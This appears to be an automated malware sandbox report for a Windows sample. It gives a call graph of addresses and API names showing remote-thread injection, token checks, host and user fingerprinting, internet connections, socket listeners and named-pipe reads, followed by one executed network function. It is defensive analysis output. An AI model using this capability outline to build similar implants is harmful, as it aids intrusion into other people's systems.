17604->17607 17605->17604 17608 4fe9523 MultiByteToWideChar 17606->17608 17625 4fe95cb 17606->17625 17609 4feb0b0 ___ansicp 84 API calls 17607->17609 17614 4fe9550 17608->17614 17608->17625 17611 4fe95f5 17609->17611 17610 4fe555e GetPdbDll 5 API calls 17612 4fe9656 17610->17612 17613 4fe9622 GetStringTypeA 17611->17613 17616 4feb0f9 ___convertcp 73 API calls 17611->17616 17611->17625 17612->17596 17618 4fe963d 17613->17618 17613->17625 17615 4fdda1b _malloc 66 API calls 17614->17615 17619 4fe9565 _memset 17614->17619 17615->17619 17620 4fe9616 17616->17620 17617 4fe959e MultiByteToWideChar 17621 4fe95b4 GetStringTypeW 17617->17621 17622 4fe95c5 17617->17622 17623 4fdd93e ___wtomb_environ 66 API calls 17618->17623 17619->17617 17619->17625 17620->17613 17620->17625 17621->17622 17624 4fe64c0 __freea 66 API calls 17622->17624 17623->17625 17624->17625 17625->17610 17633 4fde151 17626->17633 17628 4fde28e 17628->17213 17632 4fd622e 17629->17632 17630 4fe555e GetPdbDll 5 API calls 17631 4fd631e 17630->17631 17631->17213 17632->17630 17634 4fde15d __lseeki64 17633->17634 17635 4fe0075 __lock 66 API calls 17634->17635 17636 4fde164 17635->17636 17639 4fdf3d1 __decode_pointer 6 API calls 17636->17639 17643 4fde21d _doexit 17636->17643 17641 4fde19b 17639->17641 17640 4fde265 __lseeki64 17640->17628 17641->17643 17645 4fdf3d1 __decode_pointer 6 API calls 17641->17645 17650 4fde268 17643->17650 17644 4fde25c 17646 4fde061 _malloc 3 API calls 17644->17646 17649 4fde1b0 17645->17649 17646->17640 17647 4fdf3c8 6 API calls ___crtMessageBoxW 17647->17649 17648 4fdf3d1 6 API calls __decode_pointer 17648->17649 17649->17643 17649->17647 17649->17648 17651 4fde26e 17650->17651 17652 4fde249 17650->17652 17655 4fdff9b RtlLeaveCriticalSection 17651->17655 17652->17640 17654 4fdff9b RtlLeaveCriticalSection 17652->17654 17654->17644 17655->17652 17657 4fcfd71 17656->17657 17723 4fd6461 17657->17723 17659 4fde27d 66 API calls 17660 4fcfd8d 17659->17660 17660->17659 17662 4fcbe3c GetCurrentProcessId GetTickCount 17660->17662 17729 4fec4e0 17660->17729 17662->16914 17664 4fc647c 5 API calls 17663->17664 17665 4fc34db 17664->17665 17665->16917 17667 4fcbe90 17666->17667 17668 4fd35db CheckTokenMembership 17666->17668 17671 4fc57cd htonl htonl 17667->17671 17669 4fd35ed 17668->17669 17670 4fd35f0 FreeSid 17668->17670 17669->17670 17670->17667 17671->16925 17673 4fc5882 17672->17673 17674 4fc5860 _memcpy_s 17672->17674 17673->16928 17675 4fc586e htonl 17674->17675 17675->17673 17677 4fc5851 htonl 17676->17677 17678 4fc581c GetCurrentProcessId 17677->17678 17678->16934 17680 4fc5851 htonl 17679->17680 17681 4fc583c 17680->17681 17682 4fc583f 17681->17682 17683 4fc5851 htonl 17682->17683 17684 4fc584e 17683->17684 17685 4fcbca3 17684->17685 17686 4fcbf5f 66 API calls 17685->17686 17687 4fcbcb6 17686->17687 17688 4fcbcf8 GetUserNameA GetComputerNameA 17687->17688 17799 4fc637d 17688->17799 17691 4fcbd36 _strrchr 17692 4fcbd53 GetVersionExA 17691->17692 17693 4fc583f htonl 17692->17693 17694 4fcbd79 17693->17694 17695 4fc583f htonl 17694->17695 17696 4fcbd84 17695->17696 17697 4fc581f 2 API calls 17696->17697 17698 4fcbd8f 17697->17698 17699 4fc5802 2 API calls 17698->17699 17700 4fcbd97 17699->17700 17701 4fc5802 2 API calls 17700->17701 17702 4fcbda3 17701->17702 17703 4fc5802 2 API calls 17702->17703 17704 4fcbdaf 17703->17704 17705 4fc5802 2 API calls 17704->17705 17706 4fcbdb8 17705->17706 17707 4fddb76 __snprintf 102 API calls 17706->17707 17708 4fcbdd0 17707->17708 17709 4fc5851 htonl 17708->17709 17710 4fcbdf4 17709->17710 17802 4fcbfaa 17710->17802 17713 4fc588c htonl 17713->16943 17715 4fcfe09 17714->17715 17820 4fd5eca 17715->17820 17717 4fde27d 66 API calls 17719 4fcfe35 17717->17719 17719->17717 17720 4fcfe60 17719->17720 17844 4fd6396 17719->17844 17720->16945 17722 4fc79a1 17721->17722 17722->16919 17724 4fd646c 17723->17724 17725 4fd6480 17724->17725 17726 4fdda1b _malloc 66 API calls 17724->17726 17725->17660 17727 4fd648f 17726->17727 17727->17725 17728 4fdd93e ___wtomb_environ 66 API calls 17727->17728 17728->17725 17732 4fec504 17729->17732 17731 4feccdf 17731->17660 17733 4fedf99 17732->17733 17734 4fedf9c 17733->17734 17735 4fedf9b 17733->17735 17738 4fee70e 17734->17738 17735->17731 17739 4fee71b 17738->17739 17740 4fedfb1 17739->17740 17742 4fee515 17739->17742 17740->17731 17743 4fee54b failwithmessage 17742->17743 17744 4fee563 MultiByteToWideChar 17743->17744 17745 4fee57e MultiByteToWideChar 17744->17745 17746 4fee59c 17744->17746 17745->17746 17763 4fee463 17746->17763 17748 4fee5ab 17750 4fee5c5 17748->17750 17767 4fee4b3 17748->17767 17751 4fee6ff 17750->17751 17752 4fee6f9 DebugBreak 17750->17752 17753 4fee5ee IsDebuggerPresent 17750->17753 17754 4fee5fc 17750->17754 17755 4fe555e GetPdbDll 5 API calls 17751->17755 17752->17751 17753->17752 17753->17754 17771 4feee9d VirtualQuery 17754->17771 17757 4fee70c 17755->17757 17757->17740 17759 4fee65d WideCharToMultiByte 17760 4fee68c 17759->17760 17761 4fee698 WideCharToMultiByte 17759->17761 17760->17761 17762 4fee632 17761->17762 17762->17751 17762->17752 17782 4fe0b6c 17763->17782 17765 4fee46f RaiseException 17766 4fee4a2 __lseeki64 17765->17766 17766->17748 17783 4fe0b6c 17767->17783 17769 4fee4bf RaiseException 17770 4fee504 __lseeki64 17769->17770 17770->17750 17772 4feeed2 GetModuleFileNameW 17771->17772 17779 4fee627 17771->17779 17773 4feeee5 17772->17773 17772->17779 17774 4feef65 GetProcAddress 17773->17774 17773->17779 17784 4feecf7 17773->17784 17778 4feef7a 17774->17778 17774->17779 17778->17779 17780 4fef06c GetProcessHeap RtlAllocateHeap 17778->17780 17781 4fef051 GetProcessHeap HeapFree 17778->17781 17779->17759 17779->17762 17780->17779 17780->17781 17781->17779 17782->17765 17783->17769 17785 4feed1c LoadLibraryA 17784->17785 17791 4feed15 17784->17791 17786 4feed3d LoadLibraryA 17785->17786 17785->17791 17788 4feed4b GetProcAddress 17786->17788 17786->17791 17787 4fe555e GetPdbDll 5 API calls 17789 4feee9b 17787->17789 17790 4feed6a GetProcAddress 17788->17790 17788->17791 17789->17774 17789->17779 17790->17791 17792 4feed7d GetProcAddress 17790->17792 17791->17787 17792->17791 17794 4feed95 17792->17794 17793 4feee85 FreeLibrary 17793->17791 17794->17793 17795 4feee01 FreeLibrary 17794->17795 17795->17791 17797 4feee3a 17795->17797 17797->17797 17798 4feee76 LoadLibraryA 17797->17798 17798->17791 17808 4fc6388 17799->17808 17803 4fcbfb8 17802->17803 17804 4fdd93e ___wtomb_environ 66 API calls 17803->17804 17805 4fcbfbf 17804->17805 17806 4fdd93e ___wtomb_environ 66 API calls 17805->17806 17807 4fcbdfd 17806->17807 17807->17713 17815 4fc62db 17808->17815 17810 4fc63a3 WSASocketA 17811 4fc63bd WSAIoctl 17810->17811 17812 4fc6385 GetModuleFileNameA 17810->17812 17813 4fc63e1 closesocket 17811->17813 17812->17691 17813->17812 17816 4fc62f0 WSAStartup 17815->17816 17819 4fc6312 17815->17819 17817 4fc6306 WSACleanup 17816->17817 17816->17819 17818 4fde27d 66 API calls 17817->17818 17818->17819 17819->17810 17848 4fd6b8c 17820->17848 17825 4fd5f3a 17825->17719 17828 4fd6058 17829 4fdd93e ___wtomb_environ 66 API calls 17828->17829 17830 4fd6060 17829->17830 17832 4fd7061 66 API calls 17830->17832 17831 4fd5fd4 17865 4fd7061 17831->17865 17834 4fd6076 17832->17834 17834->17825 17840 4fd612a 17834->17840 17841 4fd6097 17834->17841 17836 4fd603f 17839 4fdd93e ___wtomb_environ 66 API calls 17836->17839 17837 4fd604a 17838 4fdd93e ___wtomb_environ 66 API calls 17837->17838 17838->17825 17839->17825 17840->17825 17842 4fd7061 66 API calls 17840->17842 17841->17825 17843 4fd7061 66 API calls 17841->17843 17842->17825 17843->17825 17845 4fd63a6 17844->17845 17847 4fd63c7 17845->17847 17885 4fd7163 17845->17885 17847->17719 17849 4fd5f1a 17848->17849 17850 4fd6b9a 17848->17850 17849->17825 17852 4febb50 17849->17852 17850->17849 17873 4fd90e8 17850->17873 17853 4feb2dc __calloc_impl 66 API calls 17852->17853 17854 4febb6a 17853->17854 17855 4fd5f31 17854->17855 17856 4fdfe0c __filbuf 66 API calls 17854->17856 17855->17825 17859 4fd6bfd 17855->17859 17857 4febb7d 17856->17857 17857->17855 17858 4fdfe0c __filbuf 66 API calls 17857->17858 17858->17855 17860 4fd5fc9 17859->17860 17864 4fd6c10 17859->17864 17860->17828 17860->17831 17863 4fd6bfd 5 API calls 17863->17864 17864->17860 17864->17863 17876 4fd8647 17864->17876 17880 4fd828b 17864->17880 17866 4fd7072 17865->17866 17871 4fd6032 17865->17871 17867 4febb50 _calloc 66 API calls 17866->17867 17866->17871 17868 4fd70a3 17867->17868 17869 4fd70fb 17868->17869 17868->17871 17872 4fd6bfd 5 API calls 17868->17872 17870 4fdd93e ___wtomb_environ 66 API calls 17869->17870 17870->17871 17871->17836 17871->17837 17872->17869 17874 4fdda1b _malloc 66 API calls 17873->17874 17875 4fd90f4 17874->17875 17875->17850 17879 4fd8664 17876->17879 17877 4fe555e GetPdbDll 5 API calls 17878 4fd87b2 17877->17878 17878->17864 17879->17877 17883 4fd82a2 17880->17883 17884 4fd829a 17880->17884 17881 4fd8647 5 API calls 17881->17883 17882 4fd6bfd 5 API calls 17882->17883 17883->17881 17883->17882 17883->17884 17884->17864 17886 4fd7170 17885->17886 17887 4fd7193 _memcpy_s 17886->17887 17891 4fd6356 17886->17891 17887->17847 17888 4fd71c0 17888->17887 17890 4fd6356 5 API calls 17888->17890 17890->17888 17892 4fd41db 5 API calls 17891->17892 17893 4fd6364 17892->17893 17893->17888 17895 4fc8bfc _memset 17894->17895 17896 4fc8c0e htonl 17895->17896 17897 4fc8c24 17895->17897 17896->17897 17898 4fc8c36 17896->17898 17897->16951 17911 4fc5131 17898->17911 17912 4fc5141 17911->17912 17999 4fcbff3 17912->17999 17916 4fc5171 18000 4fcc004 htonl 17999->18000 18001 4fc5164 17999->18001 18000->18001 18002 4fcc14d 18001->18002 18003 4fcbff3 htonl 18002->18003 18004 4fcc159 18003->18004 18004->17916 18235 4fd0dac 18234->18235 18237 4fd0db4 18234->18237 18235->16959 18236 4fd0de6 18238 4fd0d83 66 API calls 18236->18238 18237->18236 18239 4fd0dd9 18237->18239 18240 4fd0de0 18238->18240 18251 4fd0d83 18239->18251 18240->16959 18243 4fddc25 __time64 GetSystemTimeAsFileTime 18242->18243 18244 4fd0e2a 18243->18244 18245 4fddc25 __time64 GetSystemTimeAsFileTime 18244->18245 18246 4fd0e45 18244->18246 18245->18246 18247 4fddc25 __time64 GetSystemTimeAsFileTime 18246->18247 18248 4fd0eb4 18246->18248 18247->18248 18249 4fddc25 __time64 GetSystemTimeAsFileTime 18248->18249 18250 4fd0f2e 18248->18250 18249->18250 18250->16959 18254 4fddfbb 18251->18254 18255 4fdf61d __getptd 66 API calls 18254->18255 18256 4fd0d8b 18255->18256 18256->18240 18258 4fd301f RevertToSelf 18257->18258 18259 4fc5c4c 18257->18259 18258->18259 18260 4fc5bc4 18259->18260 18261 4fc5c33 18260->18261 18262 4fc5bda 18260->18262 18261->16965 18266 4fc47f4 18261->18266 18262->18261 18288 4fc4770 18262->18288 18265 4fc5c12 InternetSetOptionA InternetSetOptionA 18265->18261 18267 4fc480a 18266->18267 18268 4fc48a4 InternetConnectA 18267->18268 18269 4fc4815 18267->18269 18287 4fc489f 18268->18287 18270 4fc9042 66 API calls 18269->18270 18271 4fc4825 18270->18271 18287->16967 18289 4fc477c 18288->18289 18290 4fc47e0 InternetOpenA 18289->18290 18291 4fc4781 18289->18291 18303 4fc47da 18290->18303 18292 4fc9042 66 API calls 18291->18292 18293 4fc478c 18292->18293 18303->18261 18303->18265 18305 4fc60e4 _memset 18304->18305 18344 4fcda45 18305->18344 18345 4fcda54 18344->18345 18346 4fcbf5f 66 API calls 18345->18346 18347 4fcda6b 18346->18347 18353 4fd1228 18352->18353 18354 4fd12a2 18352->18354 18355 4fd122d 18353->18355 18356 4fd12a4 18353->18356 18354->16983 18355->18354 18358 4fd126b 18355->18358 18361 4fd113a 18355->18361 18356->18354 18357 4fd113a 139 API calls 18356->18357 18357->18356 18358->18354 18360 4fd113a 139 API calls 18358->18360 18360->18358 18362 4fd114b 18361->18362 18378 4fd1213 18361->18378 18363 4fc48bf 66 API calls 18362->18363 18362->18378 18364 4fd1162 18363->18364 18378->18355 18394 4fccb8c GetTickCount 18393->18394 18404 4fcc92b 18393->18404 18394->16989 18395 4fcc93a htonl select 18396 4fcc9b2 __WSAFDIsSet 18395->18396 18395->18404 18397 4fcc9c9 accept ioctlsocket 18396->18397 18396->18404 18401 4fccb8e closesocket 18397->18401 18420 4fcc9f3 18397->18420 18398 4fcca67 __WSAFDIsSet 18402 4fcca7e accept 18398->18402 18398->18404 18399 4fccacc __WSAFDIsSet 18403 4fccad9 __WSAFDIsSet 18399->18403 18399->18404 18400 4fccaf3 __WSAFDIsSet 18400->18404 18405 4fccafc __WSAFDIsSet 18400->18405 18401->18394 18447 4fcbbab ioctlsocket 18402->18447 18403->18404 18407 4fccb5d GetTickCount 18403->18407 18404->18394 18404->18395 18404->18398 18404->18399 18404->18400 18410 4fc3495 139 API calls 18404->18410 18448 4fcb387 18404->18448 18405->18404 18408 4fccb0f __WSAFDIsSet 18405->18408 18407->18404 18408->18407 18411 4fccb22 accept 18408->18411 18410->18404 18413 4fccb3c 18411->18413 18415 4fc3495 139 API calls 18413->18415 18414 4fc48bf 66 API calls 18414->18420 18416 4fccb50 closesocket 18415->18416 18416->18404 18417 4fc490f htonl 18417->18420 18418 4fc3495 139 API calls 18418->18420 18419 4fc4a58 66 API calls 18419->18420 18420->18404 18420->18414 18420->18417 18420->18418 18420->18419 18443 4fcc308 18420->18443 18422 4fccc58 18421->18422 18428 4fccc62 18421->18428 18423 4fdda1b _malloc 66 API calls 18422->18423 18423->18428 18424 4fccd81 18424->16992 18424->16993 18425 4fccc89 htonl recvfrom 18427 4fcccc3 WSAGetLastError 18425->18427 18425->18428 18426 4fcccf6 htonl ioctlsocket 18426->18428 18427->18428 18428->18424 18428->18425 18428->18426 18429 4fc3495 139 API calls 18428->18429 18431 4fccd28 18428->18431 18429->18428 18431->18428 18461 4fcc2bc 18431->18461 18433 4fccbd2 18432->18433 18439 4fccbad 18432->18439 18433->16386 18434 4fccbc0 GetTickCount 18434->18439 18435 4fccbd8 GetTickCount 18435->18439 18436 4fccbee shutdown 18436->18439 18437 4fccbfb shutdown 18438 4fccc02 closesocket 18437->18438 18438->18439 18439->18433 18439->18434 18439->18435 18439->18436 18439->18437 18439->18438 18440 4fccc2a 18439->18440 18444 4fdda1b _malloc 66 API calls 18443->18444 18445 4fcc314 GetTickCount 18444->18445 18447->18404 18450 4fcb3ad _memset 18448->18450 18449 4fcb407 18449->18404 18450->18449 18451 4fcb40f 18450->18451 18453 4fcb400 18450->18453 18452 4fcb44a 18451->18452 18454 4fdda1b _malloc 66 API calls 18451->18454 18456 4fc490f htonl 18452->18456 18455 4fc5af1 139 API calls 18453->18455 18454->18452 18455->18449 18457 4fcb470 18456->18457 18458 4fc490f htonl 18457->18458 18462 4fcc2ea 18461->18462 18463 4fcc2ca recv 18461->18463 18462->18431 18464 4fcc2e5 18463->18464 18465 4fcc2f0 shutdown closesocket 18463->18465 18464->18462 18464->18463 18465->18462 18467 4fc8b42 18466->18467 18468 4fc8b2b 18466->18468 18469 4fc8ab4 18467->18469 18471 4fc5af1 139 API calls 18467->18471 18477 4fc5ad9 18468->18477 18469->17002 18471->18469 18473 4fc8e8e 18472->18473 18474 4fc8e6c 18472->18474 18473->17007 18474->18473 18480 30d0bb0 18474->18480 18478 4fc5a00 139 API calls 18477->18478 18479 4fc5aec 18478->18479 18479->18467 18481 30d0bbc 18480->18481 18482 30d0bc5 18480->18482 18481->18482 18551 4fc8d8a _memset 18550->18551 18552 4fc8d9d 18550->18552 18553 4fdd93e ___wtomb_environ 66 API calls 18551->18553 18552->17010 18553->18552 18557 4fcb291 18554->18557 18555 4fcb2a1 18558 4fd3c8f 18555->18558 18556 4fdd93e ___wtomb_environ 66 API calls 18556->18557 18557->18555 18557->18556 18559 4fd3ca1 _memset 18558->18559 18564 4fd3d0a 18558->18564 18559->18564 18565 4fdd93e ___wtomb_environ 66 API calls 18559->18565 18566 4fd1b72 73 API calls 18559->18566 18560 4fd3d1b 18562 4fd2fa0 18560->18562 18563 4fdd93e ___wtomb_environ 66 API calls 18560->18563 18561 4fdd93e ___wtomb_environ 66 API calls 18561->18560 18562->17020 18562->17023 18562->17024 18563->18562 18564->18560 18564->18561 18565->18559 18566->18559 18568 4fd2f2f 18567->18568 18569 4fd2f3b 18567->18569 18570 4fdf3d1 __decode_pointer 6 API calls 18568->18570 18569->17025 18569->17030 18570->18569 18572 4fd1eeb 18571->18572 18573 4fd1e72 18571->18573 18575 4fd1ef7 18572->18575 18585 4fd1f6e 18572->18585 18574 4fd1e82 18573->18574 18573->18585 18576 4fc9042 66 API calls 18574->18576 18577 4fc9042 66 API calls 18575->18577 18579 4fd1e8f 18576->18579 18580 4fd1f04 18577->18580 18578 4fd2004 18581 4fd201b CreateRemoteThread 18578->18581 18582 4fd2013 CreateThread 18578->18582 18583 4fc9042 66 API calls 18579->18583 18584 4fc9042 66 API calls 18580->18584 18586 4fd1ee3 WaitForSingleObject 18581->18586 18582->18586 18587 4fd1e9f 18583->18587 18588 4fd1f14 18584->18588 18585->18578 18589 4fd1fa2 GetCurrentProcess 18585->18589 18594 4fd1fa8 18585->18594 18586->16337 18590 4fc9042 66 API calls 18587->18590 18591 4fc9042 66 API calls 18588->18591 18589->18594 18592 4fd1eab 18590->18592 18593 4fd1f20 18591->18593 18595 4fc9042 66 API calls 18592->18595 18596 4fc9042 66 API calls 18593->18596 18594->18578 18600 4fd1ff0 18594->18600 18597 4fd1eb9 18595->18597 18598 4fd1f2e 18596->18598 18601 4fc9042 66 API calls 18597->18601 18599 4fc9042 66 API calls 18598->18599 18602 4fd1f3a 18599->18602 18600->18586 18613 4fd1dc8 18600->18613 18603 4fd1ec5 18601->18603 18605 4fc9042 66 API calls 18602->18605 18604 4fc9042 66 API calls 18603->18604 18607 4fd1ed1 18604->18607 18608 4fd1f46 18605->18608 18609 4fc8f1a 71 API calls 18607->18609 18610 4fc9042 66 API calls 18608->18610 18609->18586 18611 4fd1f54 18610->18611 18612 4fc8f1a 71 API calls 18611->18612 18612->18586 18614 4fd1dd3 18613->18614 18615 4fd1dd8 18614->18615 18621 4fd1dfc 18614->18621 18616 4fc9042 66 API calls 18615->18616 18618 4fd1de7 18616->18618 18617 4fd1e58 ResumeThread 18617->18586 18619 4fc8f1a 71 API calls 18618->18619 18620 4fd1df6 18619->18620 18620->18586 18621->18617 18622 4fd1e48 18621->18622 18622->18586 18625 4fd6566 18623->18625 18624 4fd657d 18624->17062 18625->18624 18626 4fdda1b _malloc 66 API calls 18625->18626 18627 4fd65a2 18626->18627 18627->18624 18636 4fd739e 18627->18636 18637 4fd73ac 18636->18637 18666 4fc84b8 htonl 18665->18666 18667 4fc84a8 18665->18667 18672 4fc84cf 18666->18672 18668 4fdda1b _malloc 66 API calls 18667->18668 18670 4fc84b2 18668->18670 18669 4fc84fb 18673 4fc3495 139 API calls 18669->18673 18670->18666 18672->18669 18677 4fdedb2 18672->18677 18674 4fc8512 18673->18674 18680 4fc851f 18674->18680 18686 4fded1c 18677->18686 18679 4fdedca 18679->18672 18687 4fded28 __lseeki64 18686->18687 18688 4fded71 18687->18688 18689 4fded66 __lseeki64 18687->18689 18691 4fded3c _memset 18687->18691 18699 4fe354e 18688->18699 18689->18679 18692 4fdfe0c __filbuf 66 API calls 18691->18692 18952 4fcad09 PeekNamedPipe 18951->18952 18953 4fcad9a 18951->18953 18952->18953 18954 4fcad2b 18952->18954 18953->17093 18954->18953 18955 4fcad3c htonl 18954->18955 18959 4fcad73 PeekNamedPipe 18954->18959 18971 4fd2a2c 18954->18971 18955->18954 18956 4fcad9f 18955->18956 18959->18953 18959->18954 18961 4fcac3e 18960->18961 18962 4fcac43 18960->18962 18961->18962 18977 4fcb854 18961->18977 18962->17093 18965 4fcb854 2 API calls 18965->18962 18967 4fcac98 PeekNamedPipe 18966->18967 18968 4fcacae 18967->18968 18969 4fcaca9 18967->18969 18968->18967 18968->18969 18970 4fd2a2c 2 API calls 18968->18970 18969->17093 18970->18968 18972 4fd2adb ReadFile 18971->18972 18974 4fd2a43 18971->18974 18974->18972 18979 4fcac56 18977->18979 18980 4fcb868 18977->18980 18978 4fd2a2c 2 API calls 18978->18980 18979->18962 18979->18965 18980->18978 18980->18979 19006 4fd0781 19005->19006 19007 4fcc036 htons 19006->19007 19009 4fd07a6 _memcpy_s 19007->19009 19008 4fd084b _memset 19008->16403 19009->19008 19010 4fcbff3 htonl 19009->19010 19011 4fcc036 htons 19009->19011 19010->19009 19011->19009 19013 4fd0892 19012->19013 19014 4fcc036 htons 19013->19014 19018 4fd08a6 _memcpy_s 19014->19018 19015 4fd0944 _memset 19015->16409 19016 4fcc036 htons 19016->19018 19017 4fcbff3 htonl 19017->19018 19018->19015 19018->19016 19018->19017 19021 4fd0229 19019->19021 19022 4fd023e 19019->19022 19021->19022 19023 4fdf269 19021->19023 19022->16417 19024 4fdf287 19023->19024 19025 4fdf277 19023->19025 19027 4fdf154 19024->19027 19025->19021 19028 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 19027->19028 19029 4fdf169 19028->19029 19030 4fdf1c9 19029->19030 19031 4fdf175 19029->19031 19034 4fe68ca __isleadbyte_l 76 API calls 19030->19034 19036 4fdf1ee 19030->19036 19033 4fe6915 __isctype_l 90 API calls 19031->19033 19037 4fdf18d 19031->19037 19032 4fdfe0c __filbuf 66 API calls 19035 4fdf1f4 19032->19035 19033->19037 19034->19036 19039 4fe6885 19035->19039 19036->19032 19036->19035 19037->19025 19040 4fdf0cd _LocaleUpdate::_LocaleUpdate 76 API calls 19039->19040 19041 4fe6898 19040->19041 19044 4fe64e0 19041->19044 19045 4fe6501 LCMapStringW 19044->19045 19049 4fe651c 19044->19049 19046 4fe6524 GetLastError 19045->19046 19045->19049 19046->19049 19047 4fe671a 19095 4feb0b0 GetLocaleInfoA 19047->19095 19048 4fe6576 19050 4fe658f MultiByteToWideChar 19048->19050 19072 4fe6711 19048->19072 19049->19047 19049->19048 19058 4fe65bc 19050->19058 19050->19072 19052 4fe555e GetPdbDll 5 API calls 19054 4fe6883 19052->19054 19054->19037 19055 4fe675b 19101 4feb0f9 19055->19101 19056 4fe6836 LCMapStringA 19090 4fe6792 19056->19090 19057 4fe660d MultiByteToWideChar 19060 4fe6626 LCMapStringW 19057->19060 19087 4fe6708 19057->19087 19062 4fdda1b _malloc 66 API calls 19058->19062 19069 4fe65d5 19058->19069 19065 4fe6647 19060->19065 19060->19087 19061 4fe685d 19070 4fdd93e ___wtomb_environ 66 API calls 19061->19070 19061->19072 19062->19069 19064 4fe64c0 __freea 66 API calls 19064->19072 19068 4fe6650 19065->19068 19076 4fe6679 19065->19076 19066 4fdd93e ___wtomb_environ 66 API calls 19066->19061 19067 4fe6777 LCMapStringA 19074 4fe6799 19067->19074 19067->19090 19073 4fe6662 LCMapStringW 19068->19073 19068->19087 19069->19057 19069->19072 19070->19072 19071 4fe6694 19075 4fe66c8 LCMapStringW 19071->19075 19071->19087 19072->19052 19073->19087 19078 4fdda1b _malloc 66 API calls 19074->19078 19082 4fe67aa _memset 19074->19082 19079 4fe6702 19075->19079 19080 4fe66e0 WideCharToMultiByte 19075->19080 19076->19071 19077 4fdda1b _malloc 66 API calls 19076->19077 19077->19071 19078->19082 19091 4fe64c0 19079->19091 19080->19079 19081 4fe67e8 LCMapStringA 19084 4fe6808 19081->19084 19085 4fe6804 19081->19085 19082->19081 19082->19090 19088 4feb0f9 ___convertcp 73 API calls 19084->19088 19089 4fe64c0 __freea 66 API calls 19085->19089 19087->19064 19088->19085 19089->19090 19090->19061 19090->19066 19092 4fe64dd 19091->19092 19093 4fe64cc 19091->19093 19092->19087 19093->19092 19094 4fdd93e ___wtomb_environ 66 API calls 19093->19094 19094->19092 19096 4feb0de 19095->19096 19097 4feb0e3 19095->19097 19099 4fe555e GetPdbDll 5 API calls 19096->19099 19126 4fddf88 19097->19126 19100 4fe6742 19099->19100 19100->19055 19100->19056 19100->19072 19102 4feb139 GetCPInfo 19101->19102 19118 4feb1c3 19101->19118 19103 4feb1ae MultiByteToWideChar 19102->19103 19104 4feb150 19102->19104 19109 4feb169 _strlen 19103->19109 19103->19118 19104->19103 19106 4feb156 GetCPInfo 19104->19106 19105 4fe555e GetPdbDll 5 API calls 19107 4fe676d 19105->19107 19106->19103 19108 4feb163 19106->19108 19107->19067 19107->19072 19108->19103 19108->19109 19110 4fdda1b _malloc 66 API calls 19109->19110 19114 4feb19b _memset 19109->19114 19110->19114 19111 4feb1f8 MultiByteToWideChar 19112 4feb22f 19111->19112 19113 4feb210 19111->19113 19115 4fe64c0 __freea 66 API calls 19112->19115 19116 4feb217 WideCharToMultiByte 19113->19116 19117 4feb234 19113->19117 19114->19111 19114->19118 19115->19118 19116->19112 19119 4feb23f WideCharToMultiByte 19117->19119 19120 4feb253 19117->19120 19118->19105 19119->19112 19119->19120 19121 4fe6a12 __calloc_crt 66 API calls 19120->19121 19122 4feb25b 19121->19122 19122->19112 19123 4feb264 WideCharToMultiByte 19122->19123 19123->19112 19124 4feb276 19123->19124 19125 4fdd93e ___wtomb_environ 66 API calls 19124->19125 19125->19112 19127 4fe2ce0 __wcstoi64 90 API calls 19126->19127

                                                                Executed Functions

                                                                Function 00B01CA0 Relevance: 65.5, APIs: 31, Strings: 6, Instructions: 786networkstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DC4
                                                                • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DFD
                                                                  • Part of subcall function 00B02730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B0275D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01EC0
                                                                • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01EFB
                                                                • memchr.VCRUNTIME140 ref: 00B01F1C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01F9B
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B0201C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,21DC2236), ref: 00B020CB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00B042CD,00000000,00B04308,00000001,00000000,00000000,00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B0213B
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                • inet_addr.WS2_32(00000000), ref: 00B02273
                                                                • gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                • inet_addr.WS2_32(00000000), ref: 00B02283
                                                                • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00B02296
                                                                • htons.WS2_32(00000050), ref: 00B022BB
                                                                • connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                  • Part of subcall function 00B02730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B0280C
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 00B02414
                                                                • memset.VCRUNTIME140 ref: 00B02429
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B02445
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00B02465
                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 00B0247D
                                                                • memset.VCRUNTIME140 ref: 00B02495
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B024AC
                                                                • strstr.VCRUNTIME140 ref: 00B024C7
                                                                • strstr.VCRUNTIME140 ref: 00B024DA
                                                                • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00B02508
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00B02530
                                                                • closesocket.WS2_32(?), ref: 00B02563
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02595
